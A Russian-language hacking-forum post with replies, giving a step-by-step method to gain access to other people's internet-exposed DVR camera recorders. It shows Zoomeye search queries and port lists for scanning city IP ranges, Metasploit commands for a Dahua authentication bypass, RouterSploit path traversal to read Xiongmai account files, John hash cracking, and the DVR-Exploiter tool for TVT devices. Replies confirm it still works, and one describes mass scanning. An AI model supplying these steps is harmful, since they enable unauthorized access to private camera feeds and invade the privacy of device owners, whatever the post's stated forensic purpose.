DVR и Kali - методы "открытия" DVR-ов разных типов

Alex VRTL

Green Team
09.01.2020
17
12
Всем привет. Совместно с @Sunnych хочу поделиться своими наработками по "открытию" DVRов разных типов и собрать методы в одну статью.

Рабочие инструменты:
  • Kali
  • Metasploit
  • John The Reaper
  • RouterSploit
  • RouterScan
  • SmartPSS + windows 7\10
Отправные точки - Что ищем? и Где ищем?

Где ищем?
В Сети есть достаточно много диапазонов IP адресов, закрепленных за провайдером конкретного города.

Что ищем?
Вот тут вопрос сложнее. Поиск можно начинать с нескольких точек:
  1. Shodan\Zoomeye
  2. RouterScan
Лично мне понравился Zoomeye, так как нет ограничений при регистрации, да и в ряде вопросов гибче, чем Shodan.

Основные запросы в Zoomeye:
uc-httpd
/login.rsp
Dahua
Hikvision
DVR
Zoomeye достаточно умный ресурс, и подскажет, что он уже знает и как лучше искать.

RouterScan
Исходник Router Scan v2.60 Beta by Stas'M (build 04.02.2019) - Программы - Каталог файлов - Stas'M Corp., запускается прекрасно в wine
Код:
sudo dpkg --add-architecture i386 && sudo apt update && sudo apt install wine32 winbind
wine --config
Качаем архив RouterScan, распаковываем, запускаем RouterScan c помощью Wine.

1586771499247.png

В диапазон IP вписываются нужные адреса, в порты вписываются следующее:
80-89
1080
2080
8000
8001
8002
8003
8080
8081
8888
8082
8083
8090
8088
37777
В портах, как правило, и кроется «дьявол». Выбор портов – это сугубо личное дело продавца DVRа и паранойи покупателя. Да и частенько встречаются дефолтные DVRы, которые «висят» на 80, 8080 портах.

Итак, был запущен поиск, и было найдено много всякого. Начнем сортировку и пробы:

Порт 37777
Регистраторы Dahua «сидят» на порте 37777. Для работы с ним нам понадобится Kali, John The Reaper, Metasploit и словарь для подбора хешей. Результаты посмотреть можно с помощью SmartPSS под Windows 7\10 . В Kali все уже установлено, нам понадобиться словарь. Со словарем сложно что-либо посоветовать, т.к. свой словарь я собирал из множества разных словарей, и в итоге сейчас он «весит» 1.2 Гб.

Запускаем Metasploit (msfconsole)
Далее
Код:
use auxiliary/scanner/misc/dahua_dvr_auth_bypass
set action USER
set username admin
set password 111
set rhost ***.***.***.***
exploit

1586771992457.png

Если указанный IP доступен и все ок, то получите следующий ответ

1586772284402.png

Далее в домашней папке (в моем случае /root/) создаем файл 1.txt, открываем и вписываем следующее:

$dahua$********* (где звездочки - это текст из колонки Password Hash), сохраняем, закрываем.
Если Вы не поленились, и озадачились поиском passwordlist'ов, то
берем скачанный пасслист, и закидываем его в /usr/share/john/ под названием password.lst
окрываем консоль, в ней пишем
Код:
john 1.txt
1586772831720.png

Т.к. Jonh запоминает найденные результаты, Вы увидите первый результат. Просмотреть его можно с командой john 1.txt --show
Если же это новый результат, то будет искать, или пока не найдет хеш или пока не закончится словарь.

В итоге вы увидите дешифрованный пароль, который и будет искомым.

Далее скачиваем\устанавливаем отсюда Dahua. Загрузки SmartPSS,

1586773233847.png

заходим в Устройства, вбиваем IP, log\pass и смотрим.

С самым простым вариантом получения доступа к Dahua разобрались, идем дальше по результатам поиска.

Следующим, достаточно простым и быстрым в "открытии", являются dvr-ы на базе чипов Xiongmai. В результатах поиска они отображаются, как Network Surveillance DVR. Порты у них гуляют прилично, но ориентироваться будем именно на это имя.
В работе нам понадобится RouterSploit,
Код:
https://github.com/threat9/routersploit

Устанавливаем, запускаем.
Набор команд
Код:
use exploits/cameras/xiongmai/uc_httpd_path_traversal
set target ***.***.***.***
set port 81
set filename /mnt/mtd/Config/Account1
run
В итоге может быть один из вариантов

1586774718369.png

Или Exploit failed или "много текста". С первым вариантом, думаю, все понятно, во втором случае нам потребуется содержимое раздела "Password"

1586774887733.png

Содержимое строки - в ранее созданный файл 1.txt, снова в консоли john 1.txt и ждем итог.

Получили дешифрованный пароль, и тут... И тут потребуется львиная доля терпения и "как повезет с этими китайскими регистраторами". Нормального софта для просмотра я не нашел, прошлось мучиться с старым добрым IE 5\6 версий. И да, QuickTime тоже потребуется. Мало того, очень старые или относительно свежие (14-16 г.в.) могут спокойно не запуститься. Закономерности я так и не нашел, к сожалению.

Хочу так же отметить, что на базе XiongMai были и такие "шедевры", как uc-httpd 1.0.0 (Partizan Web Surveillance). Тут применим вышеуказанный метод.

Следующим, весьма распространенным, производителем есть ‎Shenzhen TVT. Работать с DVRами на базе этих чипов - одно удовольствие, т.к. все просто и доступно. Единственным НО есть просмотр через IE с плагинами.
Итак, начем.

В Сети этот производитель ищется, как:
DVR RSP
/login.rsp
DVR login
Встречается на портах от 80 до 89.

Получить возможность просмотра можно двумя способами:
Способ 1.

Запускаем Kali, идем по адресу Cyb0r9/DVR-Exploiter , качаем, устанавливаем. Есть на странице инструкция по установке, но продублирую.
$ git clone https://github.com/TunisianEagles/DVR-Exploiter.git $ cd DVR-Exploiter $ chmod +x DVR-Exploiter.sh $ ./DVR-Exploiter.sh

Видим следующее
1587120240326.png

Все весьма просто.
1. Вид вводимого хоста - IP или имя
2. Собственно сам IP
3. Порт
На выходе мы получаем много текста, откуда нам интересны два пункта - uid (имя пользователя) и pwd (пароль). Все берем без кавычек.
Открываем IE, вводим адрес, логин, пароль, смотрим
1587120576434.png

1587120667654.png

Способ 2.
Открываем браузер, идем по адресу [CVE-2018-9995]Hack Streamax DVR - Zeisic DVR
1587120847212.png

Нажимаем Hack, получаем
1587120946519.png

Логично, скажете Вы, что мол, зачем париться с standalone эксплоитом, если есть онлайновый ресурс. Первый способ ориентирован на возврат под хозяйский контроль угнанных DVRов, т.к. работает по локальной сети. К сожалению, встречаются DVRы, которые "в угоне". Т.е. они функционируют, но доступа у хозяина к ним нет из-за "хакеров", которые снесли пароли. Так же могу добавить, что цена восстановления (как правило доступов и т.д.) тех же Dahua в Украине (отправка в СЦ в Киев) сейчас крутится в районе 80-100 $.

Эти методы приходится по умолчанию применять к такого рода устройствам при проведении компьютерно технической экспертизы
Продолжение следует ...

Последнее редактирование модератором:
Если указанный IP доступен и все ок, то получите следующий ответ
Далее в домашней папке (в моем случае /root/) создаем файл 1.txt, открываем и вписываем следующее:
$dahua$********* (где звездочки - это текст из колонки Password Hash), сохраняем, закрываем.

Если указанный IP доступен и все ок, то можете получить и следующий ответ
2020-4-15 20-32-56.jpg

Dahua DVR Authentication Bypass - CVE-2013-6117 это дырка 2013 года!!! Новые прошивки "Фиксики" подлатали.
P.S.
set username admin
set password 111
- не обязательно. Это для
set action RESET ("Фиксики" и здесь натоптали).

" хочу поделиться своими наработками " - а что собственно нового-то твоего наработано ???
2020-4-17 16-54-2.jpg

Годная статья, прошу немного "черную" составляющую преобразовать в некую необходимость при форензике найти камеру злоумышленника или типа того и дадим добро на публикуацию

• Нравится
Реакции: nohchibeno
Статья годная, но что касается порта 37777 делается всё намного проще и в винде.

Я вообще не заморачиваюсь, тупо в неске диапазоны и порт 37777. Правда в основном дефолтные находит, но много.

Это точно

Dahua DVR Authentication Bypass - CVE-2013-6117 это дырка 2013 года!!! Новые прошивки "Фиксики" подлатали.
Практика показала, что нет.
Я проверял на прошивках 15-16 года - работало, как часы.
Zoomeye выдает те же результаты, что и Shodan вот только ограничения в 20 результатов, с ключом на шодане в разы больше.
Я писал, исходя из своего опыта. Мне, если честно, Шодан не зашел.
Я вообще не заморачиваюсь, тупо в неске диапазоны и порт 37777. Правда в основном дефолтные находит, но много.
Отдельно я допишу о том, как не стать тем, о чьих устройствах пишут тут. Дефолтные настройки+лог\пасс приводят в ужас. Попытка "натыкать носом" полицию с их "у нас суперзащита" закончилась фразой "Ну чо ты лезешь? Мы давно все сделали, акты подписали, и вообще, кому нужны те камеры, а?". Да и с друзьями та же история. Всем пофиг на собственную безопасность и приватность.

Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab